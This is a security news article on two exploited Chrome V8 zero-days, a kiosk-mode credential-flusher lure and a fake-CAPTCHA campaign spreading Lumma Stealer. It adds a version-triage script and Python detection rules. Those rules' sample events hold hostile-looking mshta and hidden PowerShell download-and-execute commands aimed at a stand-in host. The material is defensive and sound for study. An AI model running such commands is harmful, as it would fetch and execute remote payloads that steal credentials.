Updated on September 16 with a new CAPTCHA attack targeting Windows users.
It has been a busy few weeks for Chrome, with plenty of news for its 3 billion users to digest, and so it would be all too easy to forget that a fast-approaching update deadline is now just 72 hours away. Google has confirmed that attackers have actively exploited two dangerous Chrome vulnerabilities, and users must not remain unprotected.
The first of those memory-safety bugs, both in Chrome's V8 JavaScript engine, was made public with the Chrome update of August 21, when Google warned that CVE-2024-7971 (a type confusion in V8) was under active exploitation. The nasty surprise was that a second V8 vulnerability fixed in that same update, CVE-2024-7965 (an inappropriate implementation in V8), was also under attack. Google confirmed as much the following week.
The U.S. government's cybersecurity agency, CISA, added both to its Known Exploited Vulnerabilities (KEV) catalog, which requires federal civilian agencies to remediate, by updating Chrome or taking it out of use, by September 16 for CVE-2024-7971 and September 18 for CVE-2024-7965. CISA's deadlines are only binding on federal agencies, but many organizations follow them. To put it more simply: there are two actively exploited vulnerabilities, so update Chrome now if you have not done so since early September.
As CISA explains, it “maintains the authoritative source of vulnerabilities that have been exploited in the wild. Organizations should use the KEV catalog as an input to their vulnerability management prioritization framework.”
There have been two further desktop Chrome updates since then, on September 2 and September 10, both addressing high-severity vulnerabilities, though none so far confirmed as exploited in the wild.
Somewhat ironically, given its own procession of zero-days (including this week's Patch Tuesday), one of the two exploited Chrome vulnerabilities, CVE-2024-7971, was discovered and reported by Microsoft, which attributed the attacks to a North Korean group targeting the cryptocurrency sector. The group chained the V8 bug with a Windows kernel zero-day, CVE-2024-38106, that Microsoft had already patched.
Microsoft suggested this as a reason for users to switch from Chrome to Edge, advising organizations to “encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.”
While I wouldn’t advise that, Microsoft’s warning that Chrome phishing lures need to be stopped at source is critical. And Google is making its own moves to do just that. Google said this week that its “revamped Safety Check feature will now run automatically in the background on Chrome, taking more proactive steps to keep you safe. It will also inform you of actions it takes, including revoking permissions from sites you don’t visit anymore, flagging potentially unwanted notifications and more.”
Microsoft has also just released its latest Microsoft Threat Intelligence podcast episode, which delves into the North Korean threat behind its disclosure of CVE-2024-7971, shedding some light on the “surprising nature of recent attack chains involving vulnerability in the Chromium engine.”
Chrome comes in for a lot of flak, the downside of market domination, but deserves credit for its constant security improvements, even if you have to overlook the underlying advertising- and cookie-driven data collection. Those improvements are making a difference, as one bemusing exchange on X this week illustrated: Google’s crackdown on infostealers exploiting Chrome weaknesses is starting to bolt the stable door, albeit the exchange shows the other side clearly intends to find new ways through.
While the latest worldwide browser market share data shows Edge continuing to build its user base, it’s an exceptionally slow build; Statcounter reports a statistically irrelevant increase from 13.75% in July to 13.78% in August this year, albeit year-on-year growth is more encouraging, with Edge up from 11.15% a year ago.
Updating Chrome to the latest release addresses the two exploited zero-days as well as everything fixed since. As ever, check that the update has downloaded and then relaunch your browser, because the new build does not take effect until Chrome restarts (chrome://settings/help shows the installed version and whether a relaunch is pending). If you have made the switch to Edge, you need to do the very same: Edge is built on the same Chromium code base, so the actively exploited V8 bugs affect both browsers.
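To make that deadline actionable across a fleet rather than one browser at a time, here is an added example (my code, not from the article or from Google) that checks an inventory of installed Chrome versions against the build that first carried both fixes. The fixed build is Google's August 21 Stable release, 128.0.6613.84 (Windows and Mac also received a .85 build with the same fixes); the hostnames and version strings in SAMPLE_INVENTORY are constructed, and Edge build numbers differ, so this covers Chrome only. The pitfall it guards against is real: compared as text, "128.0.6613.9" sorts after "128.0.6613.84".

```python
import re

# Chrome Stable build that first shipped the fixes for both exploited V8 bugs
# (Google's August 21 release; Windows/Mac also got a .85 build with the same fixes).
FIXED_BUILD = (128, 0, 6613, 84)
EXPLOITED = {
    "CVE-2024-7971": FIXED_BUILD,
    "CVE-2024-7965": FIXED_BUILD,
}

VERSION_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)\.(\d+)\s*$")


def parse_version(text):
    """Turn 'MAJOR.MINOR.BUILD.PATCH' into a tuple of ints so comparisons are numeric.
    Comparing the raw strings is wrong: '128.0.6613.9' > '128.0.6613.84' as text."""
    m = VERSION_RE.match(text)
    if not m:
        raise ValueError(f"not a Chrome version string: {text!r}")
    return tuple(int(part) for part in m.groups())


def missing_fixes(version):
    """Return the exploited CVE IDs an installed build is still exposed to ([] if none)."""
    installed = parse_version(version)
    return [cve for cve, fixed in EXPLOITED.items() if installed < fixed]


def triage(inventory):
    """inventory maps hostname -> installed Chrome version string.
    Returns only the hosts that still need action, with the reason for each."""
    needs_action = {}
    for host, version in inventory.items():
        try:
            exposed = missing_fixes(version)
        except ValueError:
            # An agent that could not read the version is a finding, not a pass.
            needs_action[host] = ["version unreadable: verify manually"]
            continue
        if exposed:
            needs_action[host] = exposed
    return needs_action


# Constructed inventory for this example; not real asset data.
SAMPLE_INVENTORY = {
    "ws-01": "127.0.6533.120",   # Chrome 127-era build: exposed to both
    "ws-02": "128.0.6613.84",    # the August 21 fix itself: patched
    "ws-03": "128.0.6613.9",     # hypothetical early 128 build; string comparison would call it patched
    "ws-04": "128.0.6613.138",   # September 10 update: patched
    "ws-05": "unknown",          # agent could not read the version
}

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: {', '.join(reasons)}")
```

Feed it whatever your endpoint agent reports as the Chrome version; anything it returns is a host that is still inside the KEV window.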
Sometimes the most dangerous threats hide in plain sight, and can hit even when you have done the right thing and updated. That’s certainly the case with a new warning for Chrome users: a devious new attack that relies on frustrating you into doing something you know you shouldn’t, which makes it worse.
As picked up by Bleeping Computer, this novel attack—first disclosed by OALABS Research—is “a new technique used by stealers to force victims into entering credentials into a browser, allowing them to be stolen from the browser’s credential store using traditional stealer malware.”
The researchers explain that this is a front end for StealC malware, in a campaign designed specifically to steal Google account credentials. The attack works by launching the browser in what’s called “kiosk mode” and “navigating to the login page of the targeted service, usually Google.” Kiosk mode is a full-screen web view with no address bar or window controls, and the attack blocks the keys that would normally exit it or switch away from it.
“This tactic annoys the victim into entering their credentials in an attempt to close the window. Once the credentials are entered, they are stored in the browser’s credential store on disk and can be stolen using stealer malware, which is deployed along with the credential flusher.”
As Bleeping Computer explains, because the usual exit keys have been disabled, “try other hotkey combos like ‘Alt + F4’, ‘Ctrl + Shift + Esc’, ‘Ctrl + Alt + Delete’, and ‘Alt + Tab.’” If none of those returns focus to your desktop, “Pressing ‘Win Key + R’ should open the Windows command prompt. Type ‘cmd’ and then kill Chrome with ‘taskkill /IM chrome.exe /F.’” Or, failing that, hard reboot your PC. Note that taskkill matches by image name and /F forces termination, so this closes every Chrome process, not just the kiosk window. Killing the window also does not undo the damage if you already typed a password: the stealer is already running on the machine and the credential is in the browser’s store, so change that password from a clean device and treat the PC as compromised.
There is also a second nasty new threat for Chrome users hiding in plain sight, albeit this one is so stupidly simple it should be much easier to detect. One would hope that if it hits your PC, you won’t fall victim and will quickly shut it down.
This attack relies on a fake CAPTCHA and was first flagged by Palo Alto Networks’ Unit 42, but received very little attention at the time. Now there’s a video doing the rounds on X from researcher John Hammond, which should give it the attention it deserves.
As the researchers explain, “as recently as 2024-08-27, fake verification pages have been established to distribute Lumma Stealer malware. These pages have a button that, when clicked, shows instructions for victims to paste PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware. The associated Lumma Stealer EXE files retrieve and use zip archives that don’t appear to be inherently malicious on their own.”
Lumma Stealer is an info-stealer rented out as malware-as-a-service; it targets user credentials and crypto wallets. As Hammond’s X video shows, this doesn’t look like an everyday CAPTCHA: no genuine verification asks you to copy, paste and run a script. Candidly, if alarm bells aren’t ringing in your head at this point you should maybe power down your PC and take a rest.
Hudson Rock’s Infostealers website reported on the same attack a fortnight ago, but again this didn’t receive the pickup it deserved. “As of late August 2024,” the researchers warned, “attackers have been using fraudulent ‘human verification’ pages to trick users into executing a malicious PowerShell script.”
The fake CAPTCHA is nothing more than code on the malicious web page the user has visited. “This code clearly shows that when the verification button is clicked, the encrypted code is automatically copied to the clipboard.” The page then instructs the victim to open the Run dialog (Win + R), paste, and press Enter, so the browser itself never has to execute anything.
That code triggers the mshta binary, “a legitimate Windows utility used to execute HTML Applications (HTA) and handle embedded scripts… Since it’s a trusted and signed binary by Microsoft, it often bypasses security filters, making it a prime candidate for exploitation in ‘living off the land’ attacks. This technique allows attackers to execute malicious scripts without raising alarms, as mshta.exe typically won’t be flagged by antivirus or endpoint protection systems.”
If you haven’t cut and run by this point, the malware will execute another command to download the Lumma Stealer payload, “designed to exfiltrate sensitive information such as passwords, session tokens, cryptocurrency wallets, and other personal data from infected machines.”
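Both lures, the kiosk-mode login window described above and the pasted fake-CAPTCHA command, leave a distinctive mark in process-creation telemetry, which is where I would want to catch them rather than relying on the victim’s instincts. The following is an added example written for this article, not code from OALABS, Unit 42 or Hudson Rock: two detection rules run over constructed Sysmon-style process records. It assumes the credential flusher launches the browser with Chrome’s real `--kiosk` command-line switch pointed at accounts.google.com (the article says only “kiosk mode”), and that a command entered into the Win + R Run dialog is spawned as a child of explorer.exe, which is how that dialog works. The sample events, paths and URLs (using the reserved .invalid domain) are constructed.

```python
import re

# Simplified Sysmon Event ID 1 records: Image, CommandLine, ParentImage.
# All events below are constructed for this example, not real telemetry.
SAMPLE_EVENTS = [
    {   # browser forced into kiosk mode on the Google login page by an unknown dropper
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                       r'--kiosk https://accounts.google.com/ --disable-extensions',
        "ParentImage": r"C:\Users\alice\AppData\Local\Temp\verify.exe",
    },
    {   # fake-CAPTCHA clipboard payload pasted into Win+R: remote HTA via mshta
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta https://captcha.invalid/verify.hta",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # same lure, PowerShell download-and-execute variant pasted into Win+R
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -c "iex (irm https://captcha.invalid/x)"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # benign: user opened the Google login page normally
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com/',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # benign: scheduled script, not launched from the shell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\scripts\backup.ps1",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
]

BROWSERS = {"chrome.exe", "msedge.exe"}
LOGIN_HOSTS = ("accounts.google.com",)          # extend for other targeted services
KIOSK_SWITCH = re.compile(r"(?:^|\s)--kiosk(?:\s|$)")
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Hidden-window and download/execute idioms typical of pasted one-liners.
PS_DOWNLOAD_IDIOMS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|\biex\b|\binvoke-expression\b|\birm\b|\binvoke-restmethod\b"
    r"|\biwr\b|\binvoke-webrequest\b|downloadstring", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_kiosk_lure(event):
    """Browser started in kiosk mode straight onto a login page: the credential-flusher pattern."""
    if _basename(event["Image"]) not in BROWSERS:
        return None
    cmd = event["CommandLine"]
    if not KIOSK_SWITCH.search(cmd) or not any(h in cmd.lower() for h in LOGIN_HOSTS):
        return None
    parent = _basename(event["ParentImage"])
    # A kiosk launch from something other than the shell (a dropper in Temp, a script host)
    # is the stronger signal; a shortcut launched by explorer.exe gets a lower severity.
    severity = "medium" if parent == "explorer.exe" else "high"
    return {"rule": "browser_kiosk_login_lure", "severity": severity,
            "parent": parent, "command": cmd}


def detect_run_dialog_lolbin(event):
    """mshta.exe or PowerShell spawned by explorer.exe (the Run dialog) with a remote URL
    or download-and-execute idioms: the pasted fake-CAPTCHA command."""
    if _basename(event["ParentImage"]) != "explorer.exe":
        return None
    image = _basename(event["Image"])
    cmd = event["CommandLine"]
    suspicious = (
        (image == "mshta.exe" and REMOTE_URL.search(cmd))
        or (image in {"powershell.exe", "pwsh.exe"}
            and (REMOTE_URL.search(cmd) or PS_DOWNLOAD_IDIOMS.search(cmd)))
    )
    if not suspicious:
        return None
    return {"rule": "run_dialog_lolbin", "severity": "high",
            "parent": "explorer.exe", "command": cmd}


RULES = (detect_kiosk_lure, detect_run_dialog_lolbin)


def scan(events):
    """Run every rule over every event; return the alerts in event order."""
    alerts = []
    for event in events:
        for rule in RULES:
            alert = rule(event)
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['rule']} (parent {alert['parent']}): {alert['command']}")
```

The explorer.exe parent is what separates a pasted Run-dialog command from the same binaries launched by a scheduled task or an installer; the kiosk rule keys on the combination of the switch and a login host, since kiosk mode on its own is a legitimate feature used by signage and shared terminals.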
Just as with the Google login window running in full-screen kiosk mode, the intent here is social engineering that hides behind the familiar, leveraging the trust users place in Google logins or website CAPTCHA boxes. CAPTCHA tests have become such an everyday part of using the web that we gloss over them. And where these were once all very similar, there is now much more variety as the “are you human” challenges evolve.
And this is likely to get worse. CAPTCHA, aka the “Completely Automated Public Turing test to tell Computers and Humans Apart,” will be one of the many things reshaped by the accelerating addition of more advanced AI into so much of what we do online and the ways we interact with our devices. While this attack is crude and easy to detect, you can expect much more sophisticated variations on this theme to emerge, especially as we all find our feet in this brave new world.
As PC Mag warns, “malicious CAPTCHA tests could be easily circulated to targets by sending them phishing emails or messages. So users should be on guard if they encounter any unusual requests from a CAPTCHA test that comes their way; it could be a trap.”
This all goes to show that you can do all the right things, including updating asap, and there’s still a socially engineered campaign coming for your data. If you do find yourself falling victim to this or anything similar, run an up-to-date antivirus scan on your PC before you continue using it as normal, and change any password you entered, and sign out of active sessions, from a different, clean device: passwords and session tokens are exactly what these stealers exfiltrate.